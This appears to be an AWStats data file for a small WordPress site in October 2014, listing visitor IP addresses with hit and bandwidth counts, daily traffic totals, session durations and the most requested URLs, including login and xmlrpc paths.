218.30.103.78 2 2 27010 20141031013001
183.60.212.185 0 3 6666 
183.60.214.89 0 3 28137 
119.188.35.179 1 1 13505 20141008191619
38.103.17.184 2 3 14592 20141010101026
61.135.190.100 0 4 134320 
182.118.41.243 1 1 13505 20141030141202
123.125.71.20 0 2 3339 
61.160.232.95 1 1 13505 20141021114452
14.150.165.38 1 1 13505 20141011233504
59.50.71.83 1 1 13505 20141005223509
61.135.190.200 0 2 3339 
123.125.71.56 0 2 32422 
61.135.190.219 0 4 105237 
180.153.188.158 1 10 177429 20141031040533
54.172.149.32 1 2 20705 20141027080432
180.153.188.236 1 10 177429 20141011223957
220.181.51.51 2 2 27010 20141028054155
220.181.51.46 2 4 51574 20141011094224
37.215.177.162 1 1 25851 20141013094224
220.181.51.210 0 1 93085 
183.60.214.85 0 4 51309 
124.129.39.14 2 2 27010 20141031055329
116.24.249.52 1 1 13505 20141019172459
120.192.178.42 2 16 770679 20141002070134
202.56.13.133 2 2 26633 20141030215803
220.181.51.40 0 2 123285 
220.181.51.207 0 4 8901 
220.181.51.39 1 2 15727 20141011095659
218.30.116.93 0 1 30200 
182.118.41.40 1 1 13505 20141021091048
119.178.24.21 1 1 13505 20141007221056
218.30.116.97 0 4 101872 
183.60.213.85 0 5 74481 
123.126.68.34 4 4 54020 20141031013825
123.164.78.130 1 1 13505 20141013093249
183.60.215.5 0 9 105361 
123.125.71.16 0 5 67574 
183.60.213.102 0 4 8888 
106.42.150.74 2 16 775293 20141011104004
107.150.52.82 2 2 26974 20141026015144
61.135.190.197 0 2 0 
187.122.74.18 1 1 42 20141024164333
182.118.55.244 1 10 177429 20141024082011
112.244.225.50 1 1 13505 20141005071704
124.31.219.83 1 1 13505 20141007084914
101.226.33.226 1 6 148942 20141003021220
123.125.71.55 0 6 110413 
50.30.32.186 2 2 26974 20141028071632
220.181.51.211 0 4 8317 
122.81.153.126 2 16 775293 20141008185213
27.210.89.61 1 15 761788 20141008225941
77.222.42.202 1 1 13505 20141001225903
27.205.110.89 2 16 775293 20141007025430
183.60.213.45 0 11 86771 
220.181.132.215 0 2 94202 
183.60.213.48 0 4 51309 
117.86.21.194 1 1 13505 20141030225358
220.181.132.220 0 4 137685 
128.73.52.201 1 15 761788 20141018222324
123.125.71.26 0 2 2818 
122.143.8.73 1 1 13505 20141005141456
111.10.163.117 2 2 25146 20141029094038
128.199.167.149 2 2 27283 20141022063140
123.125.71.32 0 3 33179 
46.229.170.197 1 1 13505 20141022084441
123.125.71.22 0 4 100259 
123.151.153.35 0 2 27528 
218.30.116.99 0 3 14870 
183.60.215.27 0 3 5624 
183.60.213.93 0 4 73301 
123.150.183.171 1 14 760917 20141014073331
222.209.210.44 3 3 40515 20141022111756
2.60.166.222 1 1 13505 20141020090557
180.153.211.190 1 6 148942 20141009012432
180.149.143.146 0 1 29993 
37.1.207.83 1 1 8891 20141022065859
183.60.214.103 0 10 84028 
61.135.190.68 0 1 93085 
61.135.169.55 0 1 32714 
182.45.223.159 1 1 13505 20141004215114
123.125.71.12 0 4 119596 
217.12.207.218 1 1 13487 20141019133044
182.118.41.152 1 1 13505 20141011091125
182.118.42.103 1 1 13505 20141026091042
124.128.8.211 3 17 784184 20141024200356
183.60.214.31 0 4 8367 
50.57.190.50 1 1 42 20141024204404
183.60.212.184 0 3 49087 
183.60.213.89 0 3 6145 
78.158.11.226 2 2 33284 20141009140644
209.126.230.71 1 1 13487 20141030001132
37.57.231.126 5 5 40517 20141019044537
218.57.178.117 4 18 797689 20141031000206
123.134.218.153 1 15 761788 20141004080042
175.170.118.48 1 1 13505 20141020214723
183.60.213.86 0 2 3923 
220.181.51.208 0 3 34123 
117.22.254.10 2 2 27010 20141020215828
180.153.188.74 1 10 177429 20141003074514
218.57.220.42 1 15 761788 20141024062214
115.238.168.114 1 1 13505 20141009031406
54.165.67.69 1 1 13505 20141013233041
183.60.214.30 0 6 33240 
112.245.62.25 1 7 142277 20141015091752
220.181.51.55 0 1 1117 
218.30.116.94 0 6 30387 
78.24.50.210 1 1 13110 20141026053530
198.204.243.116 1 1 13505 20141008032339
182.118.41.71 1 1 13505 20141020080231
218.241.98.199 1 1 13505 20141012114159
123.234.240.47 1 1 13505 20141023024440
112.248.167.202 2 2 27010 20141026001605
54.167.120.246 1 1 13487 20141028085223
222.77.200.29 1 1 13505 20141010005554
183.60.244.20 5 5 67525 20141025191840
119.180.73.113 1 1 13505 20141028034437
61.135.190.198 0 2 2572 
193.150.120.177 3 3 17022 20141031093219
68.71.44.11 2 16 775293 20141008034203
183.60.213.92 0 3 49087 
183.60.212.189 0 7 56933 
183.60.215.8 0 3 5103 
123.125.71.36 0 1 23693 
192.99.9.164 1 1 13505 20141004072549
61.135.190.103 0 5 135437 
123.125.71.25 0 1 871 
218.30.116.96 0 3 67600 
218.241.98.202 1 1 13505 20141025063225
61.135.190.105 1 2 14622 20141023031428
123.125.71.27 0 6 32334 
185.24.234.102 1 1 13505 20141031093807
220.181.51.212 1 6 94926 20141022174421
180.153.214.197 1 6 148942 20141004215114
61.135.190.71 0 4 37400 
192.99.149.88 1 1 13505 20141019003559
37.57.0.198 2 2 48504 20141025181128
123.125.71.33 0 2 25394 
123.151.153.36 0 1 30200 
123.151.42.52 1 1 13505 20141007025350
182.118.42.66 1 1 13505 20141005080025
183.60.213.116 0 10 107583 
123.125.71.58 0 1 685 
180.153.206.33 1 6 148942 20141024200352
183.60.215.6 0 7 79446 
123.125.71.43 0 1 2222 
113.240.240.130 2 2 27010 20141024180415
123.125.71.51 0 5 38491 
182.118.41.137 1 1 13505 20141015080259
111.161.61.49 1 1 13505 20141007025350
123.125.71.17 0 4 189263 
183.60.214.86 0 6 55232 
183.60.215.122 0 6 54711 
54.171.82.22 1 1 13487 20141014082604
182.118.42.90 1 1 13505 20141010083234
119.190.31.56 2 12 514108 20141022223334
123.125.71.54 0 5 42613 
183.31.201.221 1 1 13505 20141021114457
113.0.39.47 1 10 177429 20141021100340
23.23.222.104 1 1 13505 20141027041137
218.81.41.70 1 1 13505 20141027035805
101.199.108.119 2 20 354858 20141021130446
101.199.108.50 2 20 354858 20141022000636
101.199.108.51 1 10 177429 20141009000214
183.60.215.117 0 1 1701 
123.125.71.23 0 4 131178 
60.13.0.180 1 1 13505 20141013213534
123.151.42.46 2 15 233286 20141007025344
188.190.120.82 1 1 13505 20141001091359
60.212.40.45 2 2 27010 20141028114608
27.205.152.66 1 1 13505 20141008213234
183.60.214.93 0 1 23693 
220.181.51.62 0 1 1701 
182.118.42.23 1 1 13505 20141025080508
183.60.213.47 0 5 53010 
101.199.108.55 1 10 177429 20141023010523
183.60.214.90 0 4 51309 
183.60.214.33 0 4 51830 
61.234.231.121 1 1 13505 20141013222322
123.125.71.34 0 4 9699 
61.135.190.72 1 5 45927 20141003080101
116.50.153.119 2 2 5716 20141024164345
123.125.71.60 0 3 61271 
183.60.215.105 0 2 3923 
180.149.143.144 0 1 167288 
183.60.243.242 4 4 54020 20141030034318
220.181.125.23 4 4 54020 20141031013826
119.147.146.189 3 9 341370 20141023024442
218.30.116.100 0 4 246570 
49.64.113.102 1 15 761788 20141012230748
123.125.71.57 0 1 93085 
111.30.132.190 1 1 13505 20141007025350
61.135.190.201 1 5 153976 20141028165624
183.60.215.7 0 9 104319 
61.61.134.139 3 3 26619 20141020000240
220.181.132.217 0 2 34035 
183.60.215.123 0 5 74481 
117.21.191.253 1 1 13505 20141009132615
54.66.206.203 1 1 13487 20141028053440
124.88.36.116 2 2 27010 20141017065852
183.60.215.10 0 3 6145 
123.125.71.13 0 2 1802 
61.135.190.199 0 2 8071 
101.226.33.227 1 6 148942 20141031001242
183.60.212.132 0 4 8367 
46.158.122.73 1 1 25851 20141012200907
123.125.71.28 0 5 72128 
221.11.109.251 1 15 761788 20141022222939
183.60.215.9 0 3 49087 
208.90.57.196 4 4 54020 20141028224434
122.4.202.228 2 2 22396 20141026074547
183.60.214.87 0 4 29317 
218.30.116.95 0 3 98037 
183.60.213.91 0 2 4444 
49.71.32.169 1 15 761788 20141009202731
85.113.58.138 1 1 13505 20141027194957
183.31.218.234 1 1 13505 20141021114449
180.153.188.99 1 10 177429 20141017021424
123.125.71.14 0 1 93085 
180.153.201.15 1 6 148942 20141007032616
183.60.214.73 0 3 5624 
115.249.123.243 1 1 5674 20141023121754
183.60.215.121 0 6 120166 
182.118.41.66 1 1 13505 20141006090921
213.159.38.90 1 1 13505 20141013192430
183.60.215.124 0 7 79967 
101.199.108.56 1 10 177429 20141017030409
182.118.41.205 1 1 13505 20141001090955
123.125.71.18 0 1 2222 
183.60.214.91 0 6 12290 
123.125.71.24 0 1 3835 
123.125.71.53 0 2 123285 
183.60.215.118 0 8 80626 
110.87.98.162 1 1 13505 20141028204704
180.149.143.22 0 1 31190 
221.213.73.7 2 2 27010 20141020063504
61.135.190.70 0 2 7670 
188.231.197.48 1 1 13505 20141029195420
14.150.164.169 1 1 13505 20141010224119
183.60.213.87 0 3 6145 
199.187.122.91 1 1 13505 20141003120912
42.236.183.84 1 10 177429 20141019224812
162.243.15.197 1 1 13505 20141020163237
183.60.212.181 0 6 54711 
183.60.212.133 0 7 57454 
123.125.82.24 1 1 13505 20141002031434
59.48.152.30 1 15 761788 20141015053019
220.181.51.61 0 1 3835 
183.60.212.165 0 4 7325 
183.60.215.125 0 8 60197 
54.219.25.217 2 2 27010 20141010232632
144.76.178.236 2 2 27010 20141009230733
221.160.124.30 1 1 42 20141008181631
61.135.190.222 1 1 13505 20141022020628
183.60.214.32 0 3 5624 
123.125.71.29 0 3 5040 
183.60.213.46 0 5 53531 
61.135.190.101 1 2 43705 20141028001114
110.247.139.7 1 1 13505 20141004004613
220.181.132.218 0 6 190638 
50.57.104.33 1 1 13505 20141024204403
182.118.41.67 1 1 13505 20141016091200
50.57.68.14 2 2 13547 20141024204421
123.125.71.30 0 1 3835 
182.36.153.143 0 4 120701 
220.181.51.209 0 7 97295 
95.211.191.83 2 2 26966 20141029120834
220.181.132.196 1 10 177429 20141011104126
183.60.213.103 0 6 55232 
58.58.75.74 2 16 765889 20141021121623
123.125.71.52 0 1 3835 
61.135.169.22 0 1 323174 
189.128.90.146 1 1 42 20141010181432
112.238.210.168 3 3 40515 20141004151042
119.177.86.118 2 16 774916 20141004004249
183.60.213.117 0 2 3402 
180.153.163.190 1 1 13505 20141022222745
220.181.132.200 1 10 177429 20141028060642
220.181.51.206 1 3 18211 20141023173950
183.60.213.90 0 3 49087 
218.75.172.3 2 16 770679 20141017004446
222.73.77.54 1 6 148942 20141026200158
183.60.214.102 0 12 131414 
101.199.108.120 1 10 177429 20141011130509
123.125.71.50 0 5 35865 
183.1.21.131 1 1 13505 20141018142302
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141001 3 20 242123 3
20141002 4 32 973032 3
20141003 7 43 640650 7
20141004 14 73 2283941 11
20141005 4 29 439322 4
20141006 13 23 361012 5
20141007 13 56 1447899 11
20141008 12 67 2580502 10
20141009 19 75 1738555 15
20141010 8 38 471784 6
20141011 24 88 2087822 14
20141012 14 104 4067637 7
20141013 11 32 516674 11
20141014 13 38 1136032 4
20141015 7 66 1699195 7
20141016 3 19 258891 3
20141017 11 58 1434521 8
20141018 2 27 906048 2
20141019 6 26 374128 5
20141020 11 28 379209 9
20141021 12 60 1430548 11
20141022 16 74 2033632 13
20141023 10 53 945592 10
20141024 38 100 2561328 13
20141025 8 14 163277 7
20141026 7 22 332007 6
20141027 15 22 315839 9
20141028 21 74 1709504 17
20141029 9 21 223109 6
20141030 7 20 221352 7
20141031 13 54 1336569 10
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
1h+ 1
5mn-15mn 3
30s-2mn 4
15mn-30mn 2
2mn-5mn 1
0s-30s 243
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 8
/ 332 4852856 241 237
/xmlrpc.php 7 294 5 6
/wp-login.php 7 39938 4 5
/wp-content/plugins/si-captcha-for-wordpress/captcha/securimage_show.php 3 17554 0 3
/wp-admin/admin-ajax.php 2 2 0 1
//wp-login.php 2 11348 2 0
/wp-login.php/wp-login.php 1 5674 1 1
/wp-login.php/ 1 5674 1 1
END_SIDER
